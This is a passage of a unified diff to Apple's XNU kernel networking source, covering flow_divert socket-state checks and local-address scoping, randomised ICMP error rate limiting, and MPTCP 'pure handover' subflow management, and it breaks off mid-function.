&(fd_cb->local_endpoint.sin.sin_addr), IFSCOPE_NONE, NULL, 0); + } + + if (error != 0) { + FDLOG(LOG_WARNING, fd_cb, "failed to derive a new local address from %d because in_pcbladdr returned %d", out_if_index, error); + } + } + } else { + ifnet_head_lock_shared(); 
+ if (out_if_index <= if_index) { + new_ifp = ifindex2ifnet[out_if_index]; + } + ifnet_head_done(); + } + + /* Update the "last interface" of the socket */ + if (new_ifp != NULL) { + if (inp->inp_vflag & INP_IPV6) { + inp->in6p_last_outifp = new_ifp; + } else { + inp->inp_last_outifp = new_ifp; + } + + } +} + static void flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offset) { @@ -2213,12 +2296,17 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, FDLOCK(fd_cb); if (fd_cb->so != NULL) { struct inpcb *inp = NULL; - struct ifnet *ifp = NULL; struct flow_divert_group *old_group; struct socket *so = fd_cb->so; + bool local_address_is_valid = false; socket_lock(so, 0); + if (!(so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring connect result"); + goto done; + } + if (SOCK_TYPE(so) == SOCK_STREAM && !(so->so_state & SS_ISCONNECTING)) { FDLOG0(LOG_ERR, fd_cb, "TCP socket is not in the connecting state, ignoring connect result"); goto done; @@ -2233,13 +2321,28 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, if (flow_divert_is_sockaddr_valid(&(local_endpoint.sa))) { if (local_endpoint.sa.sa_family == AF_INET) { local_endpoint.sa.sa_len = sizeof(struct sockaddr_in); + if ((inp->inp_vflag & INP_IPV4) && local_endpoint.sin.sin_addr.s_addr != INADDR_ANY) { + local_address_is_valid = true; + fd_cb->local_endpoint = local_endpoint; + inp->inp_laddr.s_addr = INADDR_ANY; + } else { + fd_cb->local_endpoint.sin.sin_port = local_endpoint.sin.sin_port; + } } else if (local_endpoint.sa.sa_family == AF_INET6) { local_endpoint.sa.sa_len = sizeof(struct sockaddr_in6); + if ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&local_endpoint.sin6.sin6_addr)) { + local_address_is_valid = true; + fd_cb->local_endpoint = local_endpoint; + inp->in6p_laddr = sa6_any.sin6_addr; + } else { + fd_cb->local_endpoint.sin6.sin6_port = 
local_endpoint.sin6.sin6_port; + } } - fd_cb->local_endpoint = local_endpoint; - flow_divert_set_local_endpoint(fd_cb, &(local_endpoint.sa), (SOCK_TYPE(so) == SOCK_DGRAM)); } + flow_divert_scope(fd_cb, out_if_index, !local_address_is_valid); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); + if (flow_divert_is_sockaddr_valid(&(remote_endpoint.sa)) && SOCK_TYPE(so) == SOCK_STREAM) { if (remote_endpoint.sa.sa_family == AF_INET) { remote_endpoint.sa.sa_len = sizeof(struct sockaddr_in); @@ -2270,22 +2373,6 @@ flow_divert_handle_connect_result(struct flow_divert_pcb *fd_cb, mbuf_t packet, } } - ifnet_head_lock_shared(); - if (out_if_index > 0 && out_if_index <= if_index) { - ifp = ifindex2ifnet[out_if_index]; - } - - if (ifp != NULL) { - if (inp->inp_vflag & INP_IPV4) { - inp->inp_last_outifp = ifp; - } else if (inp->inp_vflag & INP_IPV6) { - inp->in6p_last_outifp = ifp; - } - } else { - error = EINVAL; - } - ifnet_head_done(); - if (error) { goto set_socket_state; } @@ -2398,6 +2485,11 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring close from provider"); + goto done; + } + fd_cb->so->so_error = (uint16_t)ntohl(close_error); flow_divert_update_closed_state(fd_cb, how, TRUE); @@ -2410,7 +2502,7 @@ flow_divert_handle_close(struct flow_divert_pcb *fd_cb, mbuf_t packet, int offse } else if (how == SHUT_WR) { socantsendmore(fd_cb->so); } - +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -2457,6 +2549,11 @@ flow_divert_handle_data(struct flow_divert_pcb *fd_cb, mbuf_t packet, size_t off socket_lock(fd_cb->so, 0); + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring inbound data"); + goto done; + } + if (sbspace(&fd_cb->so->so_rcv) == 0) { error = ENOBUFS; fd_cb->flags |= 
FLOW_DIVERT_NOTIFY_ON_RECEIVED; @@ -2574,8 +2671,15 @@ flow_divert_handle_read_notification(struct flow_divert_pcb *fd_cb, mbuf_t packe FDLOCK(fd_cb); if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); + + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring read notification"); + goto done; + } + fd_cb->send_window += ntohl(read_count); flow_divert_send_buffered_data(fd_cb, FALSE); +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -2655,25 +2759,14 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe if (fd_cb->so != NULL) { socket_lock(fd_cb->so, 0); - if (out_if_index > 0) { - struct inpcb *inp = NULL; - struct ifnet *ifp = NULL; - - inp = sotoinpcb(fd_cb->so); - - ifnet_head_lock_shared(); - if (out_if_index <= if_index) { - ifp = ifindex2ifnet[out_if_index]; - } + if (!(fd_cb->so->so_flags & SOF_FLOW_DIVERT)) { + FDLOG0(LOG_NOTICE, fd_cb, "socket is not attached any more, ignoring properties update"); + goto done; + } - if (ifp != NULL) { - if (inp->inp_vflag & INP_IPV4) { - inp->inp_last_outifp = ifp; - } else if (inp->inp_vflag & INP_IPV6) { - inp->in6p_last_outifp = ifp; - } - } - ifnet_head_done(); + if (out_if_index > 0) { + flow_divert_scope(fd_cb, out_if_index, true); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); } if (app_data_length > 0) { @@ -2695,7 +2788,7 @@ flow_divert_handle_properties_update(struct flow_divert_pcb *fd_cb, mbuf_t packe FDLOG(LOG_ERR, fd_cb, "Failed to allocate a buffer of size %u to hold the application data from the properties update", app_data_length); } } - +done: socket_unlock(fd_cb->so, 0); } FDUNLOCK(fd_cb); @@ -3336,6 +3429,13 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t goto done; } + if (SOCK_TYPE(so) == SOCK_STREAM || /* TCP or */ + !implicit || /* connect() was called or */ + ((inp->inp_vflag & INP_IPV6) && !IN6_IS_ADDR_UNSPECIFIED(&inp->in6p_laddr)) || 
/* local address is not un-specified */ + ((inp->inp_vflag & INP_IPV4) && inp->inp_laddr.s_addr != INADDR_ANY)) { + fd_cb->flags |= FLOW_DIVERT_SHOULD_SET_LOCAL_ADDR; + } + error = flow_divert_create_connect_packet(fd_cb, to, so, p, &connect_packet); if (error) { goto done; @@ -3343,7 +3443,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t if (!implicit || SOCK_TYPE(so) == SOCK_STREAM) { flow_divert_set_remote_endpoint(fd_cb, to); - flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa), false); + flow_divert_set_local_endpoint(fd_cb, &(fd_cb->local_endpoint.sa)); } if (implicit) { @@ -3370,7 +3470,7 @@ flow_divert_connect_out_internal(struct socket *so, struct sockaddr *to, proc_t fd_cb->flags |= FLOW_DIVERT_CONNECT_STARTED; } - if (SOCK_TYPE(so) == SOCK_DGRAM) { + if (SOCK_TYPE(so) == SOCK_DGRAM && !(fd_cb->flags & FLOW_DIVERT_HAS_TOKEN)) { soisconnected(so); } else { soisconnecting(so); @@ -3521,11 +3621,6 @@ flow_divert_data_out(struct socket *so, int flags, mbuf_t data, struct sockaddr if (error) { goto done; } - - if (so->so_flags1 & SOF1_DATA_IDEMPOTENT) { - /* Open up the send window so that the data will get sent right away */ - fd_cb->send_window = (uint32_t)mbuf_pkthdr_len(data); - } } else { error = flow_divert_check_no_cellular(fd_cb) || flow_divert_check_no_expensive(fd_cb) || @@ -3798,6 +3893,8 @@ flow_divert_token_set(struct socket *so, struct sockopt *sopt) fd_cb->connect_token = token; token = NULL; + + fd_cb->flags |= FLOW_DIVERT_HAS_TOKEN; } if (hmac_error == 0) { diff --git a/bsd/netinet/icmp6.h b/bsd/netinet/icmp6.h index 5c3207167..f24f47658 100644 --- a/bsd/netinet/icmp6.h +++ b/bsd/netinet/icmp6.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2019 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. 
* * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -694,7 +694,8 @@ struct icmp6stat { #define ICMPV6CTL_ND6_MAXQLEN 24 #define ICMPV6CTL_ND6_ACCEPT_6TO4 25 #define ICMPV6CTL_ND6_OPTIMISTIC_DAD 26 /* RFC 4429 */ -#define ICMPV6CTL_MAXID 27 +#define ICMPV6CTL_ERRPPSLIMIT_RANDOM_INCR 27 +#define ICMPV6CTL_MAXID 28 #ifdef BSD_KERNEL_PRIVATE #define ICMPV6CTL_NAMES { \ diff --git a/bsd/netinet/icmp_var.h b/bsd/netinet/icmp_var.h index 42982241e..3a45a787e 100644 --- a/bsd/netinet/icmp_var.h +++ b/bsd/netinet/icmp_var.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2000-2013 Apple Inc. All rights reserved. + * Copyright (c) 2000-2020 Apple Inc. All rights reserved. * * @APPLE_OSREFERENCE_LICENSE_HEADER_START@ * @@ -93,7 +93,8 @@ struct icmpstat { #define ICMPCTL_STATS 2 /* statistics (read-only) */ #define ICMPCTL_ICMPLIM 3 #define ICMPCTL_TIMESTAMP 4 /* allow replies to time stamp requests */ -#define ICMPCTL_MAXID 5 +#define ICMPCTL_ICMPLIM_INCR 5 +#define ICMPCTL_MAXID 6 #ifdef BSD_KERNEL_PRIVATE #define ICMPCTL_NAMES { \ diff --git a/bsd/netinet/in_pcb.c b/bsd/netinet/in_pcb.c index ef0731a82..6fd6e7121 100644 --- a/bsd/netinet/in_pcb.c +++ b/bsd/netinet/in_pcb.c @@ -331,8 +331,9 @@ in_pcbinit(void) lck_mtx_init(&inpcb_timeout_lock, inpcb_lock_grp, inpcb_lock_attr); inpcb_thread_call = thread_call_allocate_with_priority(inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL); + /* Give it an arg so that we know that this is the fast timer */ inpcb_fast_thread_call = thread_call_allocate_with_priority( - inpcb_timeout, NULL, THREAD_CALL_PRIORITY_KERNEL); + inpcb_timeout, &inpcb_timeout, THREAD_CALL_PRIORITY_KERNEL); if (inpcb_thread_call == NULL || inpcb_fast_thread_call == NULL) { panic("unable to alloc the inpcb thread call"); } @@ -353,7 +354,7 @@ in_pcbinit(void) static void inpcb_timeout(void *arg0, void *arg1) { -#pragma unused(arg0, arg1) +#pragma unused(arg1) struct inpcbinfo *ipi; boolean_t t, gc; struct intimercount gccnt, tmcnt; @@ -419,10 +420,14 @@ inpcb_timeout(void 
*arg0, void *arg1) inpcb_ticking = INPCB_HAVE_TIMER_REQ(tmcnt); } - /* re-arm the timer if there's work to do */ + /* arg0 will be set if we are the fast timer */ + if (arg0 != NULL) { + inpcb_fast_timer_on = FALSE; + } inpcb_timeout_run--; VERIFY(inpcb_timeout_run >= 0 && inpcb_timeout_run < 2); + /* re-arm the timer if there's work to do */ if (gccnt.intimer_nodelay > 0 || tmcnt.intimer_nodelay > 0) { inpcb_sched_timeout(); } else if ((gccnt.intimer_fast + tmcnt.intimer_fast) <= 5) { @@ -460,7 +465,7 @@ _inpcb_sched_timeout(unsigned int offset) inpcb_timeout_run++; if (offset == 0) { inpcb_fast_timer_on = TRUE; - thread_call_enter_delayed(inpcb_thread_call, + thread_call_enter_delayed(inpcb_fast_thread_call, deadline); } else { inpcb_fast_timer_on = FALSE; diff --git a/bsd/netinet/in_pcb.h b/bsd/netinet/in_pcb.h index b7b32693a..f4d981849 100644 --- a/bsd/netinet/in_pcb.h +++ b/bsd/netinet/in_pcb.h @@ -80,6 +80,9 @@ #include #include #endif /* BSD_KERNEL_PRIVATE */ +#if !KERNEL +#include +#endif #if IPSEC #include /* for IPSEC */ @@ -370,7 +373,7 @@ struct xinpcb { u_quad_t xi_alignment_hack; }; -#if XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) +#if XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) struct inpcb64_list_entry { u_int64_t le_next; u_int64_t le_prev; @@ -412,7 +415,7 @@ struct xinpcb64 { struct xsocket64 xi_socket; u_quad_t xi_alignment_hack; }; -#endif /* XNU_TARGET_OS_OSX || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ +#endif /* XNU_TARGET_OS_OSX || KERNEL || !(TARGET_OS_IPHONE && !TARGET_OS_SIMULATOR) */ #ifdef PRIVATE struct xinpcb_list_entry { diff --git a/bsd/netinet/in_systm.h b/bsd/netinet/in_systm.h index 800ec7cfb..1a97eb8c0 100644 --- a/bsd/netinet/in_systm.h +++ b/bsd/netinet/in_systm.h @@ -63,7 +63,11 @@ #ifndef _NETINET_IN_SYSTM_H_ #define _NETINET_IN_SYSTM_H_ + +#ifndef DRIVERKIT #include +#endif /* DRIVERKIT */ + #include /* diff --git a/bsd/netinet/ip_icmp.c b/bsd/netinet/ip_icmp.c 
index 14aa9c960..0fb3d6f75 100644 --- a/bsd/netinet/ip_icmp.c +++ b/bsd/netinet/ip_icmp.c @@ -141,7 +141,6 @@ SYSCTL_INT(_net_inet_icmp, OID_AUTO, log_redirect, const static int icmp_datalen = 8; #if ICMP_BANDLIM - /* Default values in case CONFIG_ICMP_BANDLIM is not defined in the MASTER file */ #ifndef CONFIG_ICMP_BANDLIM #if XNU_TARGET_OS_OSX @@ -159,15 +158,16 @@ const static int icmp_datalen = 8; static int icmplim = CONFIG_ICMP_BANDLIM; SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RW | CTLFLAG_LOCKED, &icmplim, 0, ""); - #else /* ICMP_BANDLIM */ - static int icmplim = -1; SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM, icmplim, CTLFLAG_RD | CTLFLAG_LOCKED, &icmplim, 0, ""); - #endif /* ICMP_BANDLIM */ +static int icmplim_random_incr = CONFIG_ICMP_BANDLIM; +SYSCTL_INT(_net_inet_icmp, ICMPCTL_ICMPLIM_INCR, icmplim_random_incr, CTLFLAG_RW | CTLFLAG_LOCKED, + &icmplim_random_incr, 0, ""); + /* * ICMP broadcast echo sysctl */ @@ -1074,11 +1074,8 @@ ip_next_mtu(int mtu, int dir) /* * badport_bandlim() - check for ICMP bandwidth limit - * - * Return 0 if it is ok to send an ICMP error response, -1 if we have - * hit our bandwidth limit and it is not ok. - * - * If icmplim is <= 0, the feature is disabled and 0 is returned. + * Returns false when it is ok to send ICMP error and true to limit sending + * of ICMP error. * * For now we separate the TCP and UDP subsystems w/ different 'which' * values. 
We may eventually remove this separation (and simplify the @@ -1098,7 +1095,8 @@ badport_bandlim(int which) static int lpackets[BANDLIM_MAX + 1]; uint64_t time; uint64_t secs; - + static boolean_t is_initialized = FALSE; + static int icmplim_random; const char *bandlimittype[] = { "Limiting icmp unreach response", "Limiting icmp ping response", @@ -1113,6 +1111,14 @@ badport_bandlim(int which) return false; } + if (is_initialized == FALSE) { + if (icmplim_random_incr > 0 && + icmplim <= INT32_MAX - (icmplim_random_incr + 1)) { + icmplim_random = icmplim + (random() % icmplim_random_incr) + 1; + } + is_initialized = TRUE; + } + time = net_uptime(); secs = time - lticks[which]; @@ -1121,11 +1127,11 @@ badport_bandlim(int which) */ if (secs > 1) { - if (lpackets[which] > icmplim) { + if (lpackets[which] > icmplim_random) { printf("%s from %d to %d packets per second\n", bandlimittype[which], lpackets[which], - icmplim + icmplim_random ); } lticks[which] = time; @@ -1135,9 +1141,16 @@ badport_bandlim(int which) /* * bump packet count */ - - if (++lpackets[which] > icmplim) { - return true; + if (++lpackets[which] > icmplim_random) { + /* + * After hitting the randomized limit, we further randomize the + * behavior of how we apply rate limitation. + * We rate limit based on probability that increases with the + * increase in lpackets[which] count. 
+ */ + if ((random() % (lpackets[which] - icmplim_random)) != 0) { + return true; + } } return false; } diff --git a/bsd/netinet/mptcp.c b/bsd/netinet/mptcp.c index 39fabb2b1..85a8cebc1 100644 --- a/bsd/netinet/mptcp.c +++ b/bsd/netinet/mptcp.c @@ -792,7 +792,7 @@ mptcp_subflow_is_slow(struct mptses *mpte, struct mptsub *mpts) struct tcpcb *tp = sototcpcb(mpts->mpts_socket); int fail_thresh = mptcp_fail_thresh; - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { fail_thresh *= 2; } @@ -908,7 +908,9 @@ mptcp_get_subflow(struct mptses *mpte, struct mptsub **preferred) * Second Step: Among best and second_best. Choose the one that is * most appropriate for this particular service-type. */ - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + return mptcp_return_subflow(best); + } else if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { /* * Only handover if Symptoms tells us to do so. 
*/ @@ -1363,16 +1365,6 @@ mptcp_handle_deferred_upcalls(struct mppcb *mpp, uint32_t flag) } } -void -mptcp_ask_for_nat64(struct ifnet *ifp) -{ - in6_post_msg(ifp, KEV_INET6_REQUEST_NAT64_PREFIX, NULL, NULL); - - os_log_info(mptcp_log_handle, - "%s: asked for NAT64-prefix on %s\n", __func__, - ifp->if_name); -} - static void mptcp_reset_itfinfo(struct mpt_itf_info *info) { @@ -1517,7 +1509,7 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index, } dst = mptcp_get_session_dst(mpte, has_v6, has_v4); - if (dst && (dst->sa_family == AF_INET || dst->sa_family == 0) && + if (dst && dst->sa_family == AF_INET && has_v6 && !has_nat64 && !has_v4) { if (found_slot) { mpte->mpte_itfinfo[slot_index].ifindex = ifindex; @@ -1525,7 +1517,6 @@ mptcp_session_necp_cb(void *handle, int action, uint32_t interface_index, mpte->mpte_itfinfo[slot_index].has_v6_conn = has_v6; mpte->mpte_itfinfo[slot_index].has_nat64_conn = has_nat64; } - mptcp_ask_for_nat64(ifp); goto out; } diff --git a/bsd/netinet/mptcp_opt.c b/bsd/netinet/mptcp_opt.c index 2767e5636..31552007b 100644 --- a/bsd/netinet/mptcp_opt.c +++ b/bsd/netinet/mptcp_opt.c @@ -137,7 +137,7 @@ mptcp_setup_join_subflow_syn_opts(struct socket *so, u_char *opt, unsigned optle if (tp->t_mpflags & TMPF_BACKUP_PATH) { mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP; } else if (inp->inp_boundifp && IFNET_IS_CELLULAR(inp->inp_boundifp) && - mpts->mpts_mpte->mpte_svctype < MPTCP_SVCTYPE_AGGREGATE) { + mptcp_subflows_need_backup_flag(mpts->mpts_mpte)) { mpjoin_req.mmjo_subtype_bkp |= MPTCP_BACKUP; tp->t_mpflags |= TMPF_BACKUP_PATH; } else { @@ -974,6 +974,10 @@ mptcp_do_mpcapable_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th, if (((struct mptcp_mpcapable_opt_common *)cp)->mmco_flags & MPCAP_UNICAST_IPBIT) { mpte->mpte_flags |= MPTE_UNICAST_IP; + + /* We need an explicit signal for the addresses - zero the existing ones */ + memset(&mpte->mpte_sub_dst_v4, 0, sizeof(mpte->mpte_sub_dst_v4)); + memset(&mpte->mpte_sub_dst_v6, 
0, sizeof(mpte->mpte_sub_dst_v6)); } rsp = (struct mptcp_mpcapable_opt_rsp *)cp; @@ -1426,6 +1430,8 @@ mptcp_do_dss_opt(struct tcpcb *tp, u_char *cp, struct tcphdr *th) if (dss_rsp->mdss_subtype == MPO_DSS) { if (dss_rsp->mdss_flags & MDSS_F) { tp->t_rcv_map.mpt_dfin = 1; + } else { + tp->t_rcv_map.mpt_dfin = 0; } mptcp_do_dss_opt_meat(cp, tp, th); @@ -1548,7 +1554,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp) } if (addr_opt->maddr_len == MPTCP_ADD_ADDR_OPT_LEN_V4) { - struct sockaddr_in *dst = &mpte->mpte_dst_unicast_v4; + struct sockaddr_in *dst = &mpte->mpte_sub_dst_v4; struct in_addr *addr = &addr_opt->maddr_u.maddr_addrv4; in_addr_t haddr = ntohl(addr->s_addr); @@ -1573,7 +1579,7 @@ mptcp_do_add_addr_opt(struct mptses *mpte, u_char *cp) dst->sin_port = mpte->__mpte_dst_v4.sin_port; dst->sin_addr.s_addr = addr->s_addr; } else { - struct sockaddr_in6 *dst = &mpte->mpte_dst_unicast_v6; + struct sockaddr_in6 *dst = &mpte->mpte_sub_dst_v6; struct in6_addr *addr = &addr_opt->maddr_u.maddr_addrv6; if (IN6_IS_ADDR_LINKLOCAL(addr) || diff --git a/bsd/netinet/mptcp_subr.c b/bsd/netinet/mptcp_subr.c index f00002616..3ea459376 100644 --- a/bsd/netinet/mptcp_subr.c +++ b/bsd/netinet/mptcp_subr.c @@ -495,27 +495,23 @@ mptcp_session_create(struct mppcb *mpp) struct sockaddr * mptcp_get_session_dst(struct mptses *mpte, boolean_t ipv6, boolean_t ipv4) { - if (!(mpte->mpte_flags & MPTE_UNICAST_IP)) { - return &mpte->mpte_dst; + if (ipv6 && mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v6; } - if (ipv6 && mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v6; - } - - if (ipv4 && mpte->mpte_dst_unicast_v4.sin_family == AF_INET) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v4; + if (ipv4 && mpte->mpte_sub_dst_v4.sin_family == AF_INET) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v4; } /* The interface has neither IPv4 nor IPv6 routes. 
Give our best guess, * meaning we prefer IPv6 over IPv4. */ - if (mpte->mpte_dst_unicast_v6.sin6_family == AF_INET6) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v6; + if (mpte->mpte_sub_dst_v6.sin6_family == AF_INET6) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v6; } - if (mpte->mpte_dst_unicast_v4.sin_family == AF_INET) { - return (struct sockaddr *)&mpte->mpte_dst_unicast_v4; + if (mpte->mpte_sub_dst_v4.sin_family == AF_INET) { + return (struct sockaddr *)&mpte->mpte_sub_dst_v4; } /* We don't yet have a unicast IP */ @@ -883,6 +879,7 @@ mptcp_check_subflows_and_add(struct mptses *mpte) return; } + /* Just to see if we have an IP-address available */ if (mptcp_get_session_dst(mpte, false, false) == NULL) { return; } @@ -921,6 +918,13 @@ mptcp_check_subflows_and_add(struct mptses *mpte) if (IFNET_IS_CELLULAR(ifp)) { cellular_viable = TRUE; + + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || + mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { + if (!mptcp_is_wifi_unusable_for_session(mpte)) { + continue; + } + } } TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { @@ -943,10 +947,11 @@ mptcp_check_subflows_and_add(struct mptses *mpte) need_to_ask_symptoms = TRUE; } - if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER) { + if (mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER || mpte->mpte_svctype == MPTCP_SVCTYPE_PURE_HANDOVER) { os_log(mptcp_log_handle, - "%s - %lx: handover: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n", + "%s - %lx: %s: cell %u wifi-state %d flags %#x rxt %u first-party %u sb_cc %u ifindex %u this %u rtt %u rttvar %u rto %u\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + mpte->mpte_svctype == MPTCP_SVCTYPE_HANDOVER ? 
"handover" : "pure-handover", IFNET_IS_CELLULAR(subifp), mptcp_is_wifi_unusable_for_session(mpte), mpts->mpts_flags, @@ -1058,13 +1063,6 @@ mptcp_check_subflows_and_add(struct mptses *mpte) dst = (struct sockaddr *)&nat64pre; } - /* Initial subflow started on a NAT64'd address? */ - if (!(mpte->mpte_flags & MPTE_UNICAST_IP) && - mpte->mpte_dst.sa_family == AF_INET6 && - mpte->mpte_dst_v4_nat64.sin_family == AF_INET) { - dst = (struct sockaddr *)&mpte->mpte_dst_v4_nat64; - } - if (dst->sa_family == AF_INET && !info->has_v4_conn) { continue; } @@ -1085,36 +1083,36 @@ static void mptcp_remove_cell_subflows(struct mptses *mpte) { struct mptsub *mpts, *tmpts; - boolean_t found = false; - TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) { const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; - if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { + if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) { continue; } - /* We have a functioning subflow on WiFi. No need for cell! 
*/ - if (mpts->mpts_flags & MPTSF_CONNECTED && - !mptcp_subflow_disconnecting(mpts)) { - found = true; - } - } + os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte)); - /* Didn't found functional sub on WiFi - stay on cell */ - if (!found) { - return; + soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); } + return; +} + +static void +mptcp_remove_wifi_subflows(struct mptses *mpte) +{ + struct mptsub *mpts, *tmpts; + TAILQ_FOREACH_SAFE(mpts, &mpte->mpte_subflows, mpts_entry, tmpts) { const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; - /* Only remove cellular subflows */ - if (ifp == NULL || !IFNET_IS_CELLULAR(ifp)) { + if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { continue; } - os_log(mptcp_log_handle, "%s - %lx: removing cell subflow\n", + os_log(mptcp_log_handle, "%s - %lx: removing wifi subflow\n", __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte)); soevent(mpts->mpts_socket, SO_FILT_HINT_LOCKED | SO_FILT_HINT_MUSTRST); @@ -1123,7 +1121,69 @@ mptcp_remove_cell_subflows(struct mptses *mpte) return; } -/* Returns true if it removed a subflow on cell */ +static void +mptcp_pure_handover_subflows_remove(struct mptses *mpte) +{ + int wifi_unusable = mptcp_is_wifi_unusable_for_session(mpte); + boolean_t found_working_wifi_subflow = false; + boolean_t found_working_cell_subflow = false; + + struct mptsub *mpts; + + /* + * Look for a subflow that is on a non-cellular interface in connected + * state. + * + * In that case, remove all cellular subflows. 
+ * + * If however there is no connected subflow + */ + TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; + struct socket *so; + struct tcpcb *tp; + + if (ifp == NULL) { + continue; + } + + so = mpts->mpts_socket; + tp = sototcpcb(so); + + if (!(mpts->mpts_flags & MPTSF_CONNECTED) || + tp->t_state != TCPS_ESTABLISHED || + mptcp_subflow_disconnecting(mpts)) { + continue; + } + + if (IFNET_IS_CELLULAR(ifp)) { + found_working_cell_subflow = true; + } else { + os_log_debug(mptcp_log_handle, "%s - %lx: rxt %u sb_cc %u unusable %d\n", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), tp->t_rxtshift, mptetoso(mpte)->so_snd.sb_cc, wifi_unusable); + if (!mptcp_handover_use_cellular(mpte, tp)) { + found_working_wifi_subflow = true; + } + } + } + + /* + * Couldn't find a working subflow, let's not remove those on a cellular + * interface. + */ + os_log_debug(mptcp_log_handle, "%s - %lx: Found Wi-Fi: %u Found Cellular %u", + __func__, (unsigned long)VM_KERNEL_ADDRPERM(mpte), + found_working_wifi_subflow, found_working_cell_subflow); + if (!found_working_wifi_subflow && wifi_unusable) { + if (found_working_cell_subflow) { + mptcp_remove_wifi_subflows(mpte); + } + return; + } + + mptcp_remove_cell_subflows(mpte); +} + static void mptcp_handover_subflows_remove(struct mptses *mpte) { @@ -1176,6 +1236,7 @@ static void mptcp_targetbased_subflows_remove(struct mptses *mpte) { uint64_t time_now = mach_continuous_time(); + struct mptsub *mpts; if (mpte->mpte_time_target != 0 && (int64_t)(mpte->mpte_time_target - time_now) <= 0 && @@ -1184,7 +1245,20 @@ mptcp_targetbased_subflows_remove(struct mptses *mpte) return; } - mptcp_remove_cell_subflows(mpte); + TAILQ_FOREACH(mpts, &mpte->mpte_subflows, mpts_entry) { + const struct ifnet *ifp = sotoinpcb(mpts->mpts_socket)->inp_last_outifp; + + if (ifp == NULL || IFNET_IS_CELLULAR(ifp)) { + continue; + } + + /* We have a functioning subflow on WiFi. 
